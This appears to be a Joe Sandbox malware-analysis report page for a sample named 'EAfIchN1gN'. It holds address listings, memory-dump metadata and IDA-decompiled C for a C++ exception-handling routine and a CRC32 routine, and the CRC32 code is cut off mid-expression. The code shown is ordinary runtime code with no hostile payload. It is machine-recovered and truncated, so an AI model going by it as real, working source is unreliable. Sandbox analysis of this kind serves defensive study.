0x1000a206
0x00000000
0x00000000
0x1000a208
0x1000a20a
0x1000a20a
0x1000a20a
0x1000a20d
0x00000000
0x00000000
0x1000a20f
0x1000a20f
0x1000a210
0x1000a212
0x1000a215
0x1000a219
0x1000a219
0x1000a21b
0x1000a21d
0x1000a21d
0x1000a21d
0x1000a189
0x1000a189
0x1000a18a
0x1000a18d
0x1000a18d
0x1000a18d
0x1000a190
0x1000a192
0x00000000
0x00000000
0x1000a194
0x1000a195
0x00000000
0x00000000
0x1000a197
0x1000a197
0x1000a198
0x1000a1e0
0x1000a1e0
0x1000a24c
0x1000a24c
0x1000a24d
0x1000a24f
0x1000a251
0x1000a255
0x1000a257
0x1000a258
0x1000a25c
0x1000a25c
0x1000a25e
0x1000a260
0x1000a260
0x1000a262
0x1000a262
0x1000a262
0x1000a263
0x1000a265
0x00000000
0x1000a265
0x1000a1e3
0x1000a1e5
0x1000a1e5
0x1000a1e5
0x1000a1e8
0x00000000
0x00000000
0x1000a1ea
0x1000a1eb
0x1000a1ec
0x1000a1ed
0x1000a1ed
0x00000000
0x1000a1ed
0x1000a19b
0x1000a1de
0x1000a1de
0x1000a1df
0x00000000
0x1000a1df
0x1000a19d
0x1000a19f
0x1000a1a0
0x1000a1a3
0x1000a1a3
0x00000000
0x00000000
0x1000a1a5
0x1000a1a6
0x1000a1a6
0x1000a1a7
0x00000000
0x00000000
0x1000a1aa
0x00000000
0x00000000
0x1000a1ac
0x1000a1ad
0x1000a1ad
0x1000a1ad
0x1000a1ad
0x1000a1b0
0x1000a1b2
0x00000000
0x00000000
0x1000a1b4
0x1000a22f
0x1000a22f
0x1000a230
0x1000a230
0x1000a230
0x1000a230
0x1000a233
0x1000a234
0x00000000
0x00000000
0x1000a236
0x1000a238
0x1000a23b
0x1000a23c
0x1000a23f
0x1000a2b3
0x1000a2b3
0x00000000
0x00000000
0x1000a2b5
0x1000a2b6
0x1000a2b7
0x1000a2b7
0x1000a2ba
0x1000a2bc
0x1000a2bc
0x1000a2bd
0x1000a2be
0x1000a2c0
0x1000a2c0
0x1000a2c4
0x00000000
0x00000000
0x1000a2c6
0x1000a2c7
0x1000a2c9
0x00000000
0x00000000
0x1000a2cb
0x1000a2ce
0x1000a2d1
0x1000a2d2
0x1000a2d2
0x00000000
0x1000a2d2
0x1000a241
0x1000a242
0x1000a243
0x1000a243
0x1000a246
0x00000000
0x00000000
0x1000a248
0x1000a2ad
0x00000000
0x00000000
0x1000a2af
0x1000a2b0
0x00000000
0x00000000
0x1000a2b2
0x00000000
0x1000a2b2
0x1000a24a
0x1000a24b
0x00000000
0x1000a24b
0x1000a1b6
0x1000a1b7
0x1000a1b8
0x1000a1b9
0x1000a1b9
0x1000a220
0x1000a223
0x1000a224
0x1000a225
0x1000a226
0x1000a228
0x1000a22b
0x1000a22c
0x00000000
0x1000a22c
0x1000a1bb
0x1000a1bb
0x1000a1bb
0x1000a1bc
0x00000000
0x00000000
0x1000a1be
0x1000a1c0
0x1000a1c1
0x1000a1c2
0x1000a1c2
0x1000a1c4
0x00000000
0x00000000
0x1000a1c7
0x1000a1c8
0x1000a1c9
0x00000000
0x00000000
0x1000a1cb
0x1000a1cb
0x1000a1cc
0x1000a1cc
0x00000000
0x00000000
0x1000a1ce
0x1000a1d0
0x1000a1d1
0x1000a1d1
0x1000a1d3
0x1000a1d6
0x1000a1d8
0x1000a1d8
0x1000a1d8
0x1000a1db
0x1000a1dd
0x00000000
0x1000a1dd
0x1000a10e
0x1000a111
0x1000a112
0x1000a114
0x1000a114
0x1000a114
0x1000a114
0x1000a0c8
0x1000a0ca
0x1000a0ca
0x1000a0cb
0x1000a122
0x1000a122
0x1000a122
0x1000a122
0x1000a0ce
0x1000a0cf
0x1000a0cf
0x1000a0d0
0x1000a118
0x1000a118
0x1000a167
0x00000000
0x00000000
0x1000a169
0x1000a16a
0x00000000
0x00000000
0x1000a16c
0x1000a16c
0x1000a16e
0x1000a16f
0x00000000
0x00000000
0x1000a171
0x1000a172
0x1000a172
0x1000a172
0x1000a11a
0x1000a11b
0x1000a11f
0x1000a120
0x00000000
0x1000a120
0x1000a0d2
0x1000a0d2
0x1000a0da
0x1000a0dc
0x1000a0dc
0x1000a0dd
0x1000a134
0x1000a134
0x1000a135
0x1000a139
0x1000a13c
0x1000a13c
0x1000a142
0x1000a142
0x1000a149
0x1000a14b
0x1000a14f
0x1000a14f
0x1000a150
0x00000000
0x00000000
0x1000a152
0x00000000
0x00000000
0x1000a154
0x1000a155
0x1000a155
0x1000a15a
0x1000a15b
0x00000000
0x00000000
0x1000a15d
0x00000000
0x00000000
0x1000a15f
0x1000a160
0x00000000
0x00000000
0x1000a162
0x1000a163
0x1000a163
0x1000a163
0x1000a163
0x1000a163
0x1000a0e0
0x1000a0e2
0x00000000
0x00000000
0x1000a0e4
0x1000a0e5
0x00000000
0x00000000
0x1000a0e7
0x1000a0e7
0x1000a0e8
0x1000a0e9
0x1000a0e9
0x1000a0e9
0x1000a0ec
0x00000000
0x00000000
0x1000a0ee
0x1000a0f1
0x1000a0f1
0x1000a0f1
0x1000a0f2
0x1000a0f3
0x00000000
0x00000000
0x1000a0f5
0x1000a0f7
0x1000a0f7
0x1000a0f9
0x1000a0f9
0x1000a0fa
0x1000a0fb
0x1000a0fe
0x1000a0ff
0x1000a100
0x1000a101
0x1000a102
0x1000a104
0x1000a105
0x1000a105
0x1000a106
0x1000a107
0x1000a108
0x00000000
0x1000a108
0x1000a080
0x00000000
0x00000000
0x1000a082
0x1000a083
0x1000a084
0x1000a085
0x1000a085
0x1000a086
0x1000a088
0x1000a08a
0x1000a08a
0x1000a08b
0x00000000
0x00000000
0x1000a08e
0x00000000
0x00000000
0x1000a090
0x00000000
0x00000000
0x1000a092
0x1000a093
0x00000000
0x00000000
0x1000a095
0x1000a095
0x1000a096
0x1000a096
0x1000a097
0x1000a099
0x1000a099
0x1000a09a
0x00000000
0x00000000
0x1000a09d
0x1000a09d
0x1000a09e
0x00000000
0x00000000
0x1000a0a0
0x1000a0a0
0x1000a0a1
0x1000a115
0x00000000
0x00000000
0x1000a117
0x00000000
0x1000a117
0x1000a0a3
0x1000a0a3
0x1000a0a4
0x1000a0a6
0x1000a0a6
0x1000a0a9
0x00000000
0x00000000
0x1000a0ab
0x1000a0ac
0x1000a0ae
0x1000a0ae
0x1000a0af
0x1000a0b0
0x1000a0b1
0x1000a0b1
0x1000a0b2
0x1000a0b5
0x1000a0b5
0x1000a0b5
0x1000a0b6
0x00000000
0x00000000
0x1000a0b9
0x1000a12e
0x00000000
0x00000000
0x1000a131
0x1000a131
0x1000a133
0x00000000
0x1000a133
0x1000a0bb
0x00000000
0x00000000
0x1000a0bd
0x1000a0be
0x1000a0be
0x1000a0bf
0x1000a0bf
0x00000000
0x1000a0bf
0x1000a00f
0x1000a010
0x1000a011
0x1000a013
0x1000a014
0x1000a015
0x1000a016
0x1000a07d
0x1000a07d
0x00000000
0x1000a07d
0x1000a018
0x1000a019
0x1000a01a
0x1000a01b
0x1000a01d
0x1000a020
0x1000a021
0x1000a022
0x00000000
0x00000000
0x1000a024
0x1000a025
0x1000a02d
0x1000a02f
0x00000000
0x00000000
0x1000a031
0x1000a032
0x1000a03a
0x1000a03c
0x00000000
0x00000000
0x1000a03e
0x1000a03e
0x1000a03f
0x00000000
0x00000000
0x1000a041
0x00000000
0x00000000
0x1000a044
0x1000a046
0x1000a046
0x1000a047
0x00000000
0x00000000
0x1000a049
0x1000a04a
0x00000000
0x00000000
0x1000a04c
0x1000a04d
0x00000000
0x00000000
0x1000a04f
0x1000a052
0x00000000
0x00000000
0x1000a054
0x1000a056
0x1000a056
0x1000a057
0x00000000
0x00000000
0x1000a059
0x1000a05a
0x00000000
0x00000000
0x1000a05c
0x1000a05d
0x1000a062
0x1000a064
0x1000a065
0x1000a067
0x00000000
0x00000000
0x1000a06a
0x1000a06b
0x1000a073
0x1000a074
0x1000a076
0x00000000
0x00000000
0x1000a078
0x1000a079
0x1000a07a
0x1000a07c
0x1000a07c
0x00000000

Memory Dump Source

Source File: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c6bf69822eac6b830ca79bd8aa822a2bdc975307204309b6f2717228ea8c76
Instruction ID: 2cfc5345daabf68f9236a07c6fefbb052d29bc9f4a34cefdd33b5aea12e150e6
Opcode Fuzzy Hash: e7c6bf69822eac6b830ca79bd8aa822a2bdc975307204309b6f2717228ea8c76
Instruction Fuzzy Hash: 7322767284E7C14FE743CB344A655917FB1EF13294B1A42DBC4C28E0BBE21A5D8AC762

Uniqueness

Uniqueness Score: -1.00%

Function 00408B60 Relevance: .3, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 63%

			E00408B60(int __ebx, signed int __edi, signed int __esi, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a24) {
				char _v28;
				signed int _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v60;
				signed int* _v72;
				intOrPtr _v76;
				char _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v104;
				signed int _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				intOrPtr _v148;
				signed int _v152;
				intOrPtr _v156;
				signed int _v160;
				char _v164;
				signed int _v168;
				signed int _v172;
				char _v173;
				char _v174;
				signed int _v180;
				char _v184;
				signed int _v196;
				signed int _v200;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				char _v232;
				intOrPtr _v272;
				intOrPtr* _v292;
				intOrPtr _v296;
				char* _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v324;
				signed int _v328;
				char _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				signed int _v368;
				signed int _v372;
				signed int _t215;
				signed int _t223;
				void* _t234;
				signed int _t240;
				signed int _t246;
				signed int _t249;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t260;
				signed int _t266;
				intOrPtr _t280;
				void* _t286;
				char _t287;
				intOrPtr _t290;
				signed int _t291;
				intOrPtr _t300;
				signed int _t306;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t324;
				signed int _t329;
				signed int _t331;
				intOrPtr _t385;
				signed int _t398;
				signed int _t402;
				int _t406;
				char* _t408;
				void* _t410;
				signed int* _t411;
				intOrPtr* _t413;
				signed int* _t414;
				intOrPtr _t420;

				_t402 = __esi;
				_t398 = __edi;
				_t324 = __ebx;
				_push(__edi);
				_push(__esi);
				_t411 = _t410 - 0xbc;
				_v72 = _t411;
				_v80 =  &_v28;
				_v88 = E00408B60;
				_v84 = 0x40c51c;
				_v76 = 0x409029;
				 *_t411 =  &_v112;
				E0040B460(__ebx, __edi, __esi, __ebx);
				_v140 = 3;
				_t215 = _a20 + 0x20;
				_v144 = _a20 - 0x30;
				_v132 = _t215;
				if(_a4 != 1) {
					L18:
					 *_t411 =  &_v112;
					E0040B540(_t324);
					return _v140;
				} else {
					_t417 = _a8 - 6;
					_t329 = _a16 ^ 0x474e5543;
					if((((_a12 ^ 0x432b2b00 | _t329) & 0xffffff00 | _a8 == 0x00000006) & (_t215 & 0xffffff00 | _t417 == 0x00000000)) != 0) {
						_v168 =  *((intOrPtr*)(_v144 + 0x18));
						_v148 =  *((intOrPtr*)(_v144 + 0x20));
						_t223 =  *((intOrPtr*)(_v144 + 0x24));
						__eflags = _t223 - 1;
						_v160 = _t223;
						asm("sbb ecx, ecx");
						_t331 = (_t329 & 0xfffffffe) + 3;
						__eflags = _t331;
						goto L13;
					} else {
						 *_t411 = _a24;
						_v108 = 0xffffffff;
						_t280 = E0040B660();
						_v148 = _t280;
						_v140 = 8;
						if(_t280 == 0) {
							goto L18;
						} else {
							_v108 = 0xffffffff;
							_t398 = 0;
							_t402 = 0;
							_v156 = E00408940(_a24,  &_v60, _t280);
							_t324 = 0;
							_v52 = E00408730(_v40 & 0x000000ff, _a24);
							 *_t411 = _a24;
							_t286 = E0040B630();
							_v160 = 0;
							_t287 = _t286 - 1;
							_v164 = _t287;
							_t420 = _t287;
							_v152 = 0;
							_v168 = 0;
							_v140 = 8;
							if(_t420 < 0) {
								goto L18;
							} else {
								if(_t420 != 0) {
									do {
										_v156 = E004087B0(_v156,  &_v116);
										_t290 = E004087B0(_t289,  &_v120);
										_t95 =  &_v164;
										 *_t95 = _v164 - 1;
										__eflags =  *_t95;
										_v156 = _t290;
									} while ( *_t95 != 0);
									_t291 = _v120;
									_v160 = _v116 + 1;
									__eflags = _t291;
									if(_t291 != 0) {
										_t323 = _t291 + _v44 - 1;
										__eflags = _t323;
										_v152 = _t323;
									}
									_t331 = 0;
									__eflags = _v160;
									if(_v160 != 0) {
										_t331 = 2;
										__eflags = _v152;
										if(_v152 != 0) {
											__eflags = _a8 & 0x00000008;
											_v173 = 0;
											_v174 = 0;
											if((_a8 & 0x00000008) == 0) {
												__eflags = _a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00;
												if((_a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00) != 0) {
													goto L25;
												} else {
													_t306 =  *_v144;
													goto L26;
												}
												L36:
												__eflags = _v174;
												if(_v174 == 0) {
													__eflags = _v173 - 1;
													asm("sbb ecx, ecx");
													_t331 =  !_t331 & 0x00000002;
												} else {
													_t331 = 3;
													_v168 = _v124;
												}
												goto L6;
											} else {
												L25:
												_t306 = 0;
												__eflags = 0;
											}
											L26:
											_v172 = _t306;
											while(1) {
												_v156 = E00408800(_v152,  &_v124);
												E00408800(_t308,  &_v128);
												_t310 = _v124;
												__eflags = _t310;
												if(__eflags == 0) {
													goto L27;
												}
												if(__eflags <= 0) {
													_t402 = _v172;
													__eflags = _t402;
													if(_t402 == 0) {
														_t324 = _v48;
														E004087B0( !_t310 + _t324,  &_v136);
														_t331 = _v136;
														__eflags = _t331;
													} else {
														_t331 = _v132;
														 *_t411 = _t310;
														_v108 = 0xffffffff;
														__eflags = E00408B00( &_v60, _t331, _v172);
													}
													if(__eflags != 0) {
														goto L28;
													} else {
														goto L35;
													}
												} else {
													_t319 = E00408A10( &_v60, _t310);
													__eflags = _t319;
													if(_t319 == 0) {
														L35:
														_v174 = 1;
													} else {
														_t398 = _v172;
														__eflags = _t398;
														if(_t398 == 0) {
															L28:
															_t311 = _v128;
															__eflags = _t311;
															if(_t311 != 0) {
																_t312 = _t311 + _v156;
																__eflags = _t312;
																_v152 = _t312;
																continue;
															}
														} else {
															_v108 = 0xffffffff;
															_t331 =  &_v132;
															_t320 = E00408A90(_t319, _t324, _t331, _v172, _t398, _t402);
															__eflags = _t320;
															if(_t320 == 0) {
																goto L28;
															} else {
																goto L35;
															}
														}
													}
												}
												goto L36;
												L27:
												_v173 = 1;
												goto L28;
											}
										}
									}
								} else {
									_t331 = 1;
								}
								L6:
								_v140 = 8;
								if(_t331 == 0) {
									goto L18;
								} else {
									if((_a8 & 0x00000001) == 0) {
										L13:
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) != 0) {
											L15:
											__eflags = _t331 == 1;
											if(_t331 == 1) {
												_v108 = 0xffffffff;
												E0040A430();
												goto L50;
											} else {
												__eflags = _v168;
												if(_v168 < 0) {
													L50:
													_v108 = 2;
													E0040A460(_t398);
													_t406 =  &_a20;
													__eflags = _v108 - 1;
													_v180 = _v104;
													if(_v108 != 1) {
														_v108 = 0;
														E0040ACE0(_t324, _t402);
														 *_t411 = _v180;
														_v108 = 0xffffffff;
														E0040BB20(_t324, _t398, _t402);
														goto L52;
													}
													goto L53;
												} else {
													goto L17;
												}
											}
										} else {
											__eflags = _a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00;
											if((_a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00) == 0) {
												__eflags = _t331 == 1;
												if(_t331 == 1) {
													L52:
													_t260 = _v144 + 0x30;
													__eflags = _t260;
													 *_t411 = _t260;
													E0040ABD0(_t324, _t398, _t402);
													 *_t411 =  *(_v144 + 0xc);
													_v108 = 0xffffffff;
													E0040A3D0(_t324, _t398, _t402);
													L53:
													 *_t411 = _v180;
													E0040ABD0(_t324, _t398, _t402);
													_v108 = 1;
													E0040A430();
													_t413 = _t411 - 0xa8;
													_v300 =  &_v232;
													 *_t413 =  &_v332;
													_v220 = _t324;
													_v216 = _t402;
													_v212 = _t398;
													_v308 = E00408B60;
													_v304 = 0x40c52c;
													_v296 = 0x409120;
													_v292 = _t413;
													E0040B460(_t324, _t398, _t402, _t406);
													 *_t413 = _v200;
													E0040ABD0(_t324, _t398, _t402);
													_t234 = _v200 - 0x30;
													_v336 =  *((intOrPtr*)(_t234 + 0x20));
													_v340 =  *((intOrPtr*)(_t234 + 0x18));
													_v344 =  *((intOrPtr*)(_t234 + 0xc));
													_v328 = 2;
													_v272 =  *((intOrPtr*)(_t234 + 0x24));
													 *_t413 =  *((intOrPtr*)(_t234 + 8));
													L0040A450(_t398);
													_t408 =  &_v184;
													__eflags = _v328 - 1;
													_v348 = _v324;
													if(_v328 != 1) {
														_v128 = 0;
														E0040ACE0(_t324, _t402);
														_v128 = 0;
														E0040ACE0(_t324, _t402);
														_v128 = 0xffffffff;
														 *_t413 = _v148;
														E0040BB20(_t324, _t398, _t402);
													}
													 *_t413 = _v148;
													E0040ABD0(_t324, _t398, _t402);
													_t240 =  *((intOrPtr*)(E0040A900(_t324, _t398, _t402)));
													_v128 = 1;
													_v152 = _t240;
													_v156 = _t240 + 0x50;
													E00408940(0,  &_v80, _v136);
													 *_t413 = _v140;
													_t246 = E00408B00( &_v80, _v156,  *_v152);
													__eflags = _t246;
													if(_t246 != 0) {
														L59:
														E0040A580();
													} else {
														_v128 = 1;
														 *_t413 = _v140;
														_t251 = E00408B00( &_v80, 0, 0x4132c0);
														__eflags = _t251;
														if(_t251 != 0) {
															 *_t413 = 4;
															_t252 = E0040A600(_t324, _t398, _t402);
															_t402 = E0040A370;
															_t324 = 0x4132c0;
															 *_t252 = 0x4134f4;
															_v368 = E0040A370;
															_v372 = 0x4132c0;
															 *_t413 = _t252;
															E0040A510();
															goto L59;
														}
													}
													_v128 = 1;
													 *_t413 = _v144;
													E0040A3D0(_t324, _t398, _t402);
													0;
													0;
													_push(_t408);
													_t414 = _t413 - 8;
													_t249 = _v372;
													__eflags = _t249;
													if(_t249 != 0) {
														 *_t414 = _t249;
														L0040C1C8();
														return _t249;
													}
													return _t249;
												} else {
													__eflags = _v168;
													if(_v168 < 0) {
														_v108 = 0xffffffff;
														E00408940(_a24,  &_v60, _v148);
														 *((intOrPtr*)(_v144 + 0x24)) = E00408730(_v40 & 0x000000ff, _a24);
													}
													L17:
													_v200 = 0;
													_t324 = 7;
													_t266 = _v144 + 0x30;
													__eflags = _t266;
													_v196 = _t266;
													 *_t411 = _a24;
													_v108 = 0xffffffff;
													E0040B610();
													_v200 = 1;
													_v196 = _v168;
													 *_t411 = _a24;
													E0040B610();
													_v200 = _v160;
													 *_t411 = _a24;
													E0040B640();
													_v140 = 7;
													goto L18;
												}
											} else {
												goto L15;
											}
										}
									} else {
										if(_t331 == 2) {
											goto L18;
										} else {
											if((_a16 ^ 0x474e5543 | _a12 ^ 0x432b2b00) == 0) {
												_t300 = _v144;
												 *(_t300 + 0x18) = _v168;
												 *(_t300 + 0x1c) = _v152;
												 *((intOrPtr*)(_t300 + 0x20)) = _v148;
												_t385 = _v144;
												 *(_t385 + 0x28) = _v132;
												 *(_t385 + 0x24) = _v160;
											}
											_v140 = 6;
											 *_t411 =  &_v112;
											E0040B540(_t324);
											return _v140;
										}
									}
								}
							}
						}
					}
				}
			}

0x00408b60
0x00408b60
0x00408b60
0x00408b66
0x00408b67
0x00408b69
0x00408b6f
0x00408b72
0x00408b78
0x00408b7f
0x00408b86
0x00408b8d
0x00408b90
0x00408ba0
0x00408ba9
0x00408bb0
0x00408bb6
0x00408bb9
0x00408def
0x00408df2
0x00408df5
0x00408e0a
0x00408bbf
0x00408bbf
0x00408bd2
0x00408bdf
0x00408d32
0x00408d3e
0x00408d44
0x00408d47
0x00408d4a
0x00408d50
0x00408d55
0x00408d55
0x00000000
0x00408be5
0x00408be8
0x00408beb
0x00408bf2
0x00408bf7
0x00408c04
0x00408c0a
0x00000000
0x00408c10
0x00408c10
0x00408c1f
0x00408c21
0x00408c28
0x00408c32
0x00408c3c
0x00408c42
0x00408c45
0x00408c4a
0x00408c50
0x00408c56
0x00408c5c
0x00408c5e
0x00408c64
0x00408c6a
0x00408c70
0x00000000
0x00408c76
0x00408c76
0x00408e10
0x00408e1e
0x00408e27
0x00408e2c
0x00408e2c
0x00408e2c
0x00408e32
0x00408e32
0x00408e3d
0x00408e41
0x00408e47
0x00408e49
0x00408e50
0x00408e50
0x00408e51
0x00408e51
0x00408e5d
0x00408e5f
0x00408e61
0x00408e6d
0x00408e72
0x00408e74
0x00408e7a
0x00408e7e
0x00408e85
0x00408e8c
0x00408f98
0x00408f9a
0x00000000
0x00408fa0
0x00408fa6
0x00000000
0x00408fa6
0x00408f1d
0x00408f1d
0x00408f24
0x00408ffe
0x00409005
0x00409009
0x00408f2a
0x00408f2d
0x00408f32
0x00408f32
0x00000000
0x00408e92
0x00408e92
0x00408e92
0x00408e92
0x00408e92
0x00408e94
0x00408e94
0x00408ebc
0x00408eca
0x00408ed3
0x00408ed8
0x00408edb
0x00408edd
0x00000000
0x00000000
0x00408edf
0x00408fb0
0x00408fb6
0x00408fb8
0x00408fe2
0x00408fef
0x00408ff4
0x00408ffa
0x00408fba
0x00408fba
0x00408fbd
0x00408fc6
0x00408fd5
0x00408fd5
0x00408fd7
0x00000000
0x00408fdd
0x00000000
0x00408fdd
0x00408ee5
0x00408eea
0x00408eef
0x00408ef1
0x00408f16
0x00408f16
0x00408ef3
0x00408ef3
0x00408ef9
0x00408efb
0x00408ea7
0x00408ea7
0x00408eaa
0x00408eac
0x00408eb4
0x00408eb4
0x00408eb6
0x00000000
0x00408eb6
0x00408efd
0x00408efd
0x00408f0a
0x00408f0d
0x00408f12
0x00408f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00408f14
0x00408efb
0x00408ef1
0x00000000
0x00408ea0
0x00408ea0
0x00000000
0x00408ea0
0x00408ebc
0x00408e74
0x00408c7c
0x00408c7c
0x00408c7c
0x00408c81
0x00408c88
0x00408c8e
0x00000000
0x00408c94
0x00408c98
0x00408d58
0x00408d58
0x00408d5c
0x00408d77
0x00408d77
0x00408d78
0x00409011
0x00409018
0x00000000
0x00408d7e
0x00408d84
0x00408d86
0x0040901d
0x0040901d
0x00409024
0x00409029
0x0040902c
0x00409033
0x00409039
0x0040903b
0x00409042
0x0040904d
0x00409050
0x00409057
0x00000000
0x00409057
0x00000000
0x00000000
0x00000000
0x00000000
0x00408d86
0x00408d5e
0x00408d6f
0x00408d71
0x00408f40
0x00408f41
0x0040905c
0x00409062
0x00409062
0x00409065
0x00409068
0x00409076
0x00409079
0x00409080
0x00409085
0x0040908b
0x0040908e
0x00409093
0x0040909a
0x004090a6
0x004090ac
0x004090b2
0x004090b5
0x004090b8
0x004090bb
0x004090be
0x004090c5
0x004090cc
0x004090d3
0x004090d6
0x004090de
0x004090e1
0x004090e9
0x004090ef
0x004090f5
0x004090fe
0x0040910a
0x00409111
0x00409114
0x00409117
0x00409120
0x00409123
0x0040912a
0x00409130
0x00409132
0x00409139
0x0040913e
0x00409145
0x0040914a
0x00409157
0x0040915a
0x0040915a
0x00409166
0x00409169
0x00409173
0x00409178
0x00409182
0x0040918b
0x00409193
0x004091aa
0x004091b2
0x004091b7
0x004091b9
0x0040920a
0x0040920a
0x004091bb
0x004091bb
0x004091cd
0x004091d5
0x004091da
0x004091dc
0x004091de
0x004091e5
0x004091ea
0x004091ef
0x004091f4
0x004091fa
0x004091fe
0x00409202
0x00409205
0x00000000
0x00409205
0x004091dc
0x0040920f
0x0040921c
0x0040921f
0x0040922a
0x0040922e
0x00409230
0x00409233
0x00409236
0x00409239
0x0040923b
0x0040923d
0x00409240
0x00000000
0x00409240
0x00409246
0x00408f47
0x00408f4d
0x00408f4f
0x00408f55
0x00408f68
0x00408f7f
0x00408f7f
0x00408d8c
0x00408d99
0x00408d9d
0x00408da2
0x00408da2
0x00408da5
0x00408dac
0x00408daf
0x00408db6
0x00408dc1
0x00408dc5
0x00408dcc
0x00408dcf
0x00408dda
0x00408de1
0x00408de4
0x00408de9
0x00000000
0x00408de9
0x00000000
0x00000000
0x00000000
0x00408d71
0x00408c9e
0x00408ca1
0x00000000
0x00408ca7
0x00408cba
0x00408cbc
0x00408cc8
0x00408cd1
0x00408cda
0x00408ce0
0x00408ce6
0x00408cef
0x00408cef
0x00408cf7
0x00408d00
0x00408d03
0x00408d18
0x00408d18
0x00408ca1
0x00408c98
0x00408c8e
0x00408c70
0x00408c0a
0x00408bdf

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a82c55dfd39a0c610aa2bb486ca2b702f981955c47fa771b32c863d3c877bdfa
Instruction ID: fb9014d8d90ad197938c66955a6f40d0fed81886d76c48f73c17b708fb267f63
Opcode Fuzzy Hash: a82c55dfd39a0c610aa2bb486ca2b702f981955c47fa771b32c863d3c877bdfa
Instruction Fuzzy Hash: 8AE1FD74A003198FDB24DF65C98079EBBB1BF44314F1486AED898AB381DB389D85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00408054 Relevance: .1, Instructions: 102
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00408054(signed int _a4, signed char* _a8, intOrPtr _a12) {
				signed char* _t61;
				signed char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed char* _t65;
				signed char* _t66;
				signed char* _t67;
				signed char* _t68;
				signed int _t69;
				signed char _t70;
				intOrPtr _t98;

				_t69 = _a4;
				_t61 = _a8;
				_t98 = _a12;
				if(_t61 != 0) {
					_t70 =  !_t69;
					if(_t98 <= 7) {
						L4:
						if(_t98 == 0) {
							L7:
							return  !_t70;
						}
						do {
							_t70 = _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4);
							_t61 =  &(_t61[1]);
							_t98 = _t98 - 1;
						} while (_t98 != 0);
						goto L7;
					}
					do {
						_t62 =  &(_t61[1]);
						_t63 =  &(_t62[1]);
						_t64 =  &(_t63[1]);
						_t65 =  &(_t64[1]);
						_t66 =  &(_t65[1]);
						_t67 =  &(_t66[1]);
						_t68 =  &(_t67[1]);
						_t70 = (((((((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t64 & 0x000000ff ^ ((_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t63 & 0x000000ff ^ (_t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x412d60 + (( *_t62 & 0x000000ff ^ _t70 >> 0x00000008 ^  *(0x412d60 + (( *_t61 & 0x000000ff ^ _t70) & 0x000000ff) * 4)) & 